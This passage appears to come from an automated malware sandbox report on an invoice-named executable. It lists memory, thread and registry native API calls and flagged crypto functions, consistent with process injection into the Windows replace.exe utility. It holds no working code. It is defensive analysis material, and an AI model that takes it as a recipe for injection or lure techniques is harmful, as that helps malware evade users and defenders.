Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01034650 NtSuspendThread, 2_2_01034650
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032B80 NtQueryInformationFile, 2_2_01032B80
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032BA0 NtEnumerateValueKey, 2_2_01032BA0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032BE0 NtQueryValueKey, 2_2_01032BE0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032BF0 NtAllocateVirtualMemory, 2_2_01032BF0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032AB0 NtWaitForSingleObject, 2_2_01032AB0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032AD0 NtReadFile, 2_2_01032AD0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032AF0 NtWriteFile, 2_2_01032AF0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032D00 NtSetInformationFile, 2_2_01032D00
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032D10 NtMapViewOfSection, 2_2_01032D10
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032D30 NtUnmapViewOfSection, 2_2_01032D30
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032DB0 NtEnumerateKey, 2_2_01032DB0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032DD0 NtDelayExecution, 2_2_01032DD0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032C00 NtQueryInformationProcess, 2_2_01032C00
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032C60 NtCreateKey, 2_2_01032C60
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032CA0 NtQueryInformationToken, 2_2_01032CA0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032CC0 NtQueryVirtualMemory, 2_2_01032CC0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032CF0 NtOpenProcess, 2_2_01032CF0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032F30 NtCreateSection, 2_2_01032F30
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032F60 NtCreateProcessEx, 2_2_01032F60
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032F90 NtProtectVirtualMemory, 2_2_01032F90
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032FA0 NtQuerySection, 2_2_01032FA0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032FB0 NtResumeThread, 2_2_01032FB0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032FE0 NtCreateFile, 2_2_01032FE0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032E30 NtWriteVirtualMemory, 2_2_01032E30
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032E80 NtReadVirtualMemory, 2_2_01032E80
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032EA0 NtAdjustPrivilegesToken, 2_2_01032EA0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01032EE0 NtQueueApcThread, 2_2_01032EE0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01033010 NtOpenDirectoryObject, 2_2_01033010
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01033090 NtSetValueKey, 2_2_01033090
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010339B0 NtGetContextThread, 2_2_010339B0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01033D10 NtOpenProcessToken, 2_2_01033D10
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01033D70 NtOpenThread, 2_2_01033D70
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B4340 NtSetContextThread,LdrInitializeThunk, 5_2_036B4340
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B4650 NtSuspendThread,LdrInitializeThunk, 5_2_036B4650
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B35C0 NtCreateMutant,LdrInitializeThunk, 5_2_036B35C0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2B60 NtClose,LdrInitializeThunk, 5_2_036B2B60
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2BE0 NtQueryValueKey,LdrInitializeThunk, 5_2_036B2BE0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_036B2BF0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2BA0 NtEnumerateValueKey,LdrInitializeThunk, 5_2_036B2BA0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2AF0 NtWriteFile,LdrInitializeThunk, 5_2_036B2AF0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2AD0 NtReadFile,LdrInitializeThunk, 5_2_036B2AD0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B39B0 NtGetContextThread,LdrInitializeThunk, 5_2_036B39B0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2F30 NtCreateSection,LdrInitializeThunk, 5_2_036B2F30
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2FE0 NtCreateFile,LdrInitializeThunk, 5_2_036B2FE0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2FB0 NtResumeThread,LdrInitializeThunk, 5_2_036B2FB0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2EE0 NtQueueApcThread,LdrInitializeThunk, 5_2_036B2EE0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2E80 NtReadVirtualMemory,LdrInitializeThunk, 5_2_036B2E80
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2D30 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_036B2D30
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_036B2D10
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_036B2DF0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2DD0 NtDelayExecution,LdrInitializeThunk, 5_2_036B2DD0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2C60 NtCreateKey,LdrInitializeThunk, 5_2_036B2C60
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_036B2C70
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_036B2CA0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B3010 NtOpenDirectoryObject, 5_2_036B3010
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B3090 NtSetValueKey, 5_2_036B3090
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2B80 NtQueryInformationFile, 5_2_036B2B80
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2AB0 NtWaitForSingleObject, 5_2_036B2AB0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2F60 NtCreateProcessEx, 5_2_036B2F60
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2FA0 NtQuerySection, 5_2_036B2FA0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2F90 NtProtectVirtualMemory, 5_2_036B2F90
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2E30 NtWriteVirtualMemory, 5_2_036B2E30
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2EA0 NtAdjustPrivilegesToken, 5_2_036B2EA0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B3D70 NtOpenThread, 5_2_036B3D70
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2D00 NtSetInformationFile, 5_2_036B2D00
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B3D10 NtOpenProcessToken, 5_2_036B3D10
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2DB0 NtEnumerateKey, 5_2_036B2DB0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2C00 NtQueryInformationProcess, 5_2_036B2C00
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2CF0 NtOpenProcess, 5_2_036B2CF0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B2CC0 NtQueryVirtualMemory, 5_2_036B2CC0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E27AC0 NtCreateFile, 5_2_00E27AC0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E27C20 NtReadFile, 5_2_00E27C20
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E27DA0 NtClose, 5_2_00E27DA0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E27D10 NtDeleteFile, 5_2_00E27D10
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E27F00 NtAllocateVirtualMemory, 5_2_00E27F00
Detected potential crypto function
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 0_2_0190BB40 0_2_0190BB40
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00401190 2_2_00401190
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00403210 2_2_00403210
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00402313 2_2_00402313
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00402320 2_2_00402320
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00402510 2_2_00402510
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0040FD1A 2_2_0040FD1A
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0040FD23 2_2_0040FD23
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0042D673 2_2_0042D673
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_004166C3 2_2_004166C3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_004166BE 2_2_004166BE
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0040FF43 2_2_0040FF43
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00402750 2_2_00402750
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0040DFC3 2_2_0040DFC3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0109A118 2_2_0109A118
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01088158 2_2_01088158
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010C01AA 2_2_010C01AA
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B81CC 2_2_010B81CC
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01092000 2_2_01092000
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF0100 2_2_00FF0100
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BA352 2_2_010BA352
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010C03E6 2_2_010C03E6
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0100E3F0 2_2_0100E3F0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010A0274 2_2_010A0274
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010802C0 2_2_010802C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01000535 2_2_01000535
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010C0591 2_2_010C0591
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B2446 2_2_010B2446
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010AE4F6 2_2_010AE4F6
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01024750 2_2_01024750
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01000770 2_2_01000770
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFC7C0 2_2_00FFC7C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101C6E0 2_2_0101C6E0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FE68B8 2_2_00FE68B8
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01016962 2_2_01016962
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010029A0 2_2_010029A0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010CA9A6 2_2_010CA9A6
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0100A840 2_2_0100A840
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01002840 2_2_01002840
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102E8F0 2_2_0102E8F0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BAB40 2_2_010BAB40
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFEA80 2_2_00FFEA80
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B6BD7 2_2_010B6BD7
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0100AD00 2_2_0100AD00
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF0CF2 2_2_00FF0CF2
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01018DBF 2_2_01018DBF
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01000C00 2_2_01000C00
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFADE0 2_2_00FFADE0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010A0CB5 2_2_010A0CB5
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01042F28 2_2_01042F28
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01020F30 2_2_01020F30
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01074F40 2_2_01074F40
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107EFA0 2_2_0107EFA0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BEE26 2_2_010BEE26
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF2FC8 2_2_00FF2FC8
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01000E59 2_2_01000E59
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01012E90 2_2_01012E90
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BCE93 2_2_010BCE93
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BEEDB 2_2_010BEEDB
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010CB16B 2_2_010CB16B
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0103516C 2_2_0103516C
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0100B1B0 2_2_0100B1B0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FEF172 2_2_00FEF172
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010070C0 2_2_010070C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010AF0CC 2_2_010AF0CC
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B70E9 2_2_010B70E9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BF0E0 2_2_010BF0E0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B132D 2_2_010B132D
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0104739A 2_2_0104739A
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010052A0 2_2_010052A0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FED34C 2_2_00FED34C
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101B2C0 2_2_0101B2C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010A12ED 2_2_010A12ED
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101D2F0 2_2_0101D2F0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B7571 2_2_010B7571
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF1460 2_2_00FF1460
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0109D5B0 2_2_0109D5B0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BF43F 2_2_010BF43F
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BF7B0 2_2_010BF7B0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B16CC 2_2_010B16CC
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01095910 2_2_01095910
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01009950 2_2_01009950
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101B950 2_2_0101B950
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106D800 2_2_0106D800
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010038E0 2_2_010038E0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BFB76 2_2_010BFB76
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101FB80 2_2_0101FB80
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01075BF0 2_2_01075BF0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0103DBF9 2_2_0103DBF9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BFA49 2_2_010BFA49
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B7A46 2_2_010B7A46
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01073A6C 2_2_01073A6C
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01045AA0 2_2_01045AA0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0109DAAC 2_2_0109DAAC
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010ADAC6 2_2_010ADAC6
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01003D40 2_2_01003D40
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B1D5A 2_2_010B1D5A
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B7D73 2_2_010B7D73
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101FDC0 2_2_0101FDC0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01079C32 2_2_01079C32
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BFCF2 2_2_010BFCF2
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BFF09 2_2_010BFF09
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01001F92 2_2_01001F92
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BFFB1 2_2_010BFFB1
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01009EB0 2_2_01009EB0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0373A352 5_2_0373A352
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0366D34C 5_2_0366D34C
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0373132D 5_2_0373132D
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_037403E6 5_2_037403E6
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0368E3F0 5_2_0368E3F0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036C739A 5_2_036C739A
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03720274 5_2_03720274
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0369D2F0 5_2_0369D2F0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_037212ED 5_2_037212ED
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0369B2C0 5_2_0369B2C0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036852A0 5_2_036852A0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036B516C 5_2_036B516C
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0366F172 5_2_0366F172
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0374B16B 5_2_0374B16B
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03708158 5_2_03708158
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03670100 5_2_03670100
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0371A118 5_2_0371A118
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_037381CC 5_2_037381CC
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0368B1B0 5_2_0368B1B0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_037401AA 5_2_037401AA
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0373F0E0 5_2_0373F0E0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_037370E9 5_2_037370E9
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036870C0 5_2_036870C0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0372F0CC 5_2_0372F0CC
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03680770 5_2_03680770
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036A4750 5_2_036A4750
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0367C7C0 5_2_0367C7C0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0373F7B0 5_2_0373F7B0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0369C6E0 5_2_0369C6E0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_037316CC 5_2_037316CC
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03737571 5_2_03737571
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03680535 5_2_03680535
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0371D5B0 5_2_0371D5B0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03740591 5_2_03740591
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03671460 5_2_03671460
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03732446 5_2_03732446
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0373F43F 5_2_0373F43F
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0372E4F6 5_2_0372E4F6
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0373FB76 5_2_0373FB76
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0373AB40 5_2_0373AB40
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036BDBF9 5_2_036BDBF9
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036F5BF0 5_2_036F5BF0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03736BD7 5_2_03736BD7
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0369FB80 5_2_0369FB80
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036F3A6C 5_2_036F3A6C
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03737A46 5_2_03737A46
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0373FA49 5_2_0373FA49
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0372DAC6 5_2_0372DAC6
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036C5AA0 5_2_036C5AA0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0371DAAC 5_2_0371DAAC
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0367EA80 5_2_0367EA80
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03696962 5_2_03696962
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03689950 5_2_03689950
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0369B950 5_2_0369B950
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036829A0 5_2_036829A0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0374A9A6 5_2_0374A9A6
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03682840 5_2_03682840
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0368A840 5_2_0368A840
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036ED800 5_2_036ED800
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036838E0 5_2_036838E0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036AE8F0 5_2_036AE8F0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036668B8 5_2_036668B8
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036F4F40 5_2_036F4F40
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036C2F28 5_2_036C2F28
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036A0F30 5_2_036A0F30
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0373FF09 5_2_0373FF09
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03672FC8 5_2_03672FC8
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0373FFB1 5_2_0373FFB1
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03681F92 5_2_03681F92
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03680E59 5_2_03680E59
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0373EE26 5_2_0373EE26
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0373EEDB 5_2_0373EEDB
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03689EB0 5_2_03689EB0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0373CE93 5_2_0373CE93
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03692E90 5_2_03692E90
